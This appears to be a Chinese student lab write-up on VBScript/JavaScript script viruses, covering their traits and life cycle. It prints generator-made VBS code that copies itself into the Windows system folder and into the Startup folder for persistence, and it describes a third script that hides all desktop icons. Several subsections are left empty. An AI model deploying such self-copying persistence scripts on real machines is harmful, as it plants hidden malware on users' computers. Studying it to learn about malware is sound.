一、脚本病毒的概念:
脚本病毒通常是 JavaScript 或 VBScript 等语言编写的恶意代码,一般广告性质,会修改 IE 首页、修改注册表等信息,对用户计算机造成破坏。 通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。一般具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性等不良特性;其生命周期一般为开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。
二、实践3种不同功能的脚本病毒:
1.将一个Win32system的vbs文件写入system32系统文件夹中:
(1)利用病毒生成器生成的这个vbs病毒代码如下:
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")(2)带注释的版本:
(3)效果:
2. 写入到开始菜单中的版本:
On Error Resume Next
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
pt=ws.specialfolders("startup")&"\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs")
(2)带注释的版本:
(3)效果,反正我没有成功,
不过借用了 上面那个它另外给的代码后,在开启菜单中出现了这个vbs文件本身的副本
3.禁用桌面所有图标的版本
(1)生成的代码:
(2)带注释的版本:
(3)效果:
桌边的所有图标都不能显示了,但是开始菜单还是可以打开的
